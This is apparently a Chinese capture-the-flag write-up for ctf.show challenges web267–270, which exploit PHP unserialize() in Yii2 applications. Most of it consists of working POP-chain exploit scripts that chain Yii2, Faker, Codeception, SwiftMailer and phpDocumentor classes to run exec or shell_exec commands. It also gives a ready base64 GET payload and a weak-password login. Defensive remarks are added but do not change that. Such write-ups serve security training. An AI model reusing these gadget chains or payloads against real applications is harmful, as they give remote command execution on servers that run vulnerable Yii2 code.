web267
查看源代码发现这三个页面
然后发现登录页面可以直接用弱口令 admin/admin 登录
登录成功
然后发现about页面有细微变化
然后看到了
///backdoor/shell
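unserialize(base64_decode($_GET['code']))
也就是说,backdoor/shell 这个路由会把用户可控的 GET 参数 code 经 base64 解码后直接交给 unserialize(),这是本题的漏洞根因:不可信数据一旦进入反序列化,就可以借助应用中已存在的类拼出对象链。修复思路是不要对外部输入调用 unserialize()(改用 json_decode),确实需要时至少传入 ['allowed_classes' => false]。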
EXP
<?php
namespace yii\rest{
// Stand-in for yii\rest\IndexAction. Only the namespace, class name and the two
// property names/values matter here: serialize() records those, never method bodies.
class IndexAction{
// Holds a PHP function name (assigned in the constructor).
public $checkAccess;
// Holds the string that ends up as that function's argument (assigned in the constructor).
public $id;
public function __construct(){
// NOTE(review): presumably the framework's real run() passes $checkAccess to
// call_user_func() with $id as the argument; that is not visible in this file,
// confirm against the framework source actually deployed.
$this->checkAccess='exec';
$this->id='cat /flag >3.txt';
}
}
}
namespace Faker{
use yii\rest\IndexAction;
// Stand-in for Faker\Generator that carries a single protected property.
class Generator{
// Map of name => callable. Being protected, it is serialized with the "\0*\0" name prefix.
protected $formatters;
public function __construct(){
// Binds the key 'close' to the callable [IndexAction instance, 'run'].
// NOTE(review): presumably the real Generator resolves calls to undefined methods
// through this map, so a close() call on the object would invoke the callable; confirm.
$this->formatters['close']=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
// Stand-in for yii\db\BatchQueryResult; the outermost object of the serialized graph.
class BatchQueryResult{
// Private, so serialize() stores it under the class-qualified property name.
private $_dataReader;
public function __construct(){
// NOTE(review): presumably the real class calls close() on $_dataReader when the
// object is destroyed, which would make destruction after unserialize() the
// entry point; not shown in this file, confirm against the deployed version.
$this->_dataReader=new Generator();
}
}
}
namespace {
use yii\db\BatchQueryResult;
// Emits base64(serialize(object graph)), mirroring the endpoint's
// unserialize(base64_decode(...)) decoding order.
// Defensive takeaway: the receiving side should never hand request data to
// unserialize(); json_decode(), or unserialize($data, ['allowed_classes' => false]),
// prevents object graphs like this one from being instantiated.
echo base64_encode(serialize(new BatchQueryResult()));
}
?>
传参GET:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjExOiJscyAvID4xLnR4dCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
访问
http://08a2bbcd-9f38-4806-bf8d-902d04e4a1fc.challenge.ctf.show/3.txt
传参之后页面可能会报错,但可以忽略,继续访问上面的文件即可
web268
一样的操作
EXP
<?php
namespace yii\rest{
// Stand-in for yii\rest\CreateAction. Only the class name and the two property
// names/values are carried into the serialized string.
class CreateAction{
// Holds a PHP function name (assigned in the constructor).
public $checkAccess;
// Holds the string that ends up as that function's argument (assigned in the constructor).
public $id;
public function __construct(){
// NOTE(review): presumably the framework's real run() passes $checkAccess to
// call_user_func() with $id as the argument; not visible here, confirm.
$this->checkAccess='shell_exec';
// The command pipes its output through tee, which also writes it to 2.txt.
$this->id='tac /f* | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
// Stand-in for Faker\Generator that carries a single protected property.
class Generator{
// Map of name => callable. Being protected, it is serialized with the "\0*\0" name prefix.
protected $formatters;
public function __construct(){
// Binds the key 'isRunning' to the callable [CreateAction instance, 'run'].
// NOTE(review): presumably the real Generator resolves calls to undefined methods
// through this map, so an isRunning() call on the object would invoke the callable; confirm.
$this->formatters['isRunning']=[new CreateAction(),'run'];
}
}
}
namespace Codeception\Extension{
use Faker\Generator;
// Stand-in for Codeception\Extension\RunProcess; the outermost object of this graph.
// Its presence shows that a test-only dependency is loadable in the target application.
class RunProcess{
// Private list; here it holds exactly one Generator instance.
private $processes;
public function __construct(){
// NOTE(review): presumably the real extension calls isRunning() on every entry of
// $processes when it is destroyed; not shown in this file, confirm.
$this->processes=[new Generator()];
}
}
}
namespace {
// Emits base64(serialize(object graph)) for the RunProcess stand-in.
// Defensive takeaway: development/test packages should not be installed in
// production (e.g. install without dev dependencies), and request data should
// never reach unserialize() in the first place.
echo base64_encode((serialize(new Codeception\Extension\RunProcess())));
}
?>
补充说明:shell_exec 是 PHP 的内置函数,用于通过 shell 执行命令,并将完整输出作为字符串返回
id='cat /flags | tee 2.txt';
用于绕过
|(管道符号): 管道符号用于将前一个命令的输出作为后一个命令的输入。在这里,它将cat /flags命令的输出作为下一个命令的输入。
tee命令的作用是读取标准输入的数据,并同时将其写入到指定的文件以及标准输出。
web269
EXP
<?php
namespace yii\rest{
// Stand-in for yii\rest\CreateAction. Only the class name and the two property
// names/values are carried into the serialized string.
class CreateAction{
// Holds a PHP function name (assigned in the constructor).
public $checkAccess;
// Holds the string that ends up as that function's argument (assigned in the constructor).
public $id;
public function __construct(){
// NOTE(review): presumably the framework's real run() passes $checkAccess to
// call_user_func() with $id as the argument; not visible here, confirm.
$this->checkAccess='shell_exec';
// The command pipes its output through tee, which also writes it to 2.txt.
$this->id='cat /flagsa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
// Stand-in for Faker\Generator that carries a single protected property.
class Generator{
// Map of name => callable. Being protected, it is serialized with the "\0*\0" name prefix.
protected $formatters;
public function __construct(){
// Binds the key 'render' to the callable [CreateAction instance, 'run'].
// NOTE(review): presumably the real Generator resolves calls to undefined methods
// through this map, so a render() call on the object would invoke the callable; confirm.
$this->formatters['render']=[new CreateAction(),'run'];
}
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
// Stand-in for phpDocumentor\Reflection\DocBlock\Tags\See; the middle link of this graph.
class See{
// Protected, so it is serialized with the "\0*\0" name prefix; holds a Generator here.
protected $description;
public function __construct(){
// NOTE(review): presumably the real See renders $description (calls render() on it)
// when the tag is converted to a string; not shown in this file, confirm.
$this->description=new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
// Stand-in for the global-namespace class Swift_KeyCache_DiskKeyCache; the outermost
// object of this graph.
class Swift_KeyCache_DiskKeyCache{
// Private nested array; only needs to be non-empty (the contents are filler).
private $keys=[];
// Private; normally a path string, here replaced by an object.
private $path;
public function __construct(){
// NOTE(review): presumably the real destructor walks $keys and builds file paths by
// concatenating $path with the key names, which would force the See object to be
// converted to a string; not shown in this file, confirm.
$this->path=new See;
$this->keys=array(
"axin"=>array("is"=>"handsome")
);
}
}
// Emits base64(serialize(object graph)).
// Defensive takeaway: every library on the autoload path widens what an
// unserialize() call on untrusted input can instantiate; restricting
// allowed_classes or switching to json_decode() removes that surface.
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>
web270
EXP
<?php
namespace yii\rest{
// Stand-in for yii\rest\IndexAction. Only the class name and the two property
// names/values are carried into the serialized string.
class IndexAction{
// Holds a PHP function name (assigned in the constructor).
public $checkAccess;
// Holds the string that ends up as that function's argument (assigned in the constructor).
public $id;
public function __construct(){
// NOTE(review): presumably the framework's real run() passes $checkAccess to
// call_user_func() with $id as the argument; not visible here, confirm.
$this->checkAccess='shell_exec';
// The command pipes its output through tee, which also writes it to 2.txt.
$this->id='cat /flagsaa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace yii\web{
use yii\rest\IndexAction;
// Stand-in for yii\web\DbSession; replaces the Faker\Generator link used in the
// other variants with a framework-native class.
class DbSession{
// Public callable slot; set to [IndexAction instance, 'run'] below.
public $writeCallback;
public function __construct(){
// NOTE(review): presumably the real session class invokes $writeCallback while
// closing the session; not shown in this file, confirm.
$this->writeCallback=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use yii\web\DbSession;
// Stand-in for yii\db\BatchQueryResult; the outermost object of the serialized graph.
class BatchQueryResult{
// Private, so serialize() stores it under the class-qualified property name.
private $_dataReader;
public function __construct(){
// NOTE(review): presumably the real class calls close() on $_dataReader when the
// object is destroyed; here that object is a DbSession rather than a data reader.
// Not shown in this file, confirm against the deployed version.
$this->_dataReader=new DbSession();
}
}
}
namespace {
use yii\db\BatchQueryResult;
// Emits base64(serialize(object graph)) for the BatchQueryResult stand-in.
// Defensive takeaway: blocking individual classes does not close the hole while
// request data still reaches unserialize(); remove that call or restrict
// allowed_classes on the receiving side.
echo base64_encode(serialize(new BatchQueryResult()));
}
?>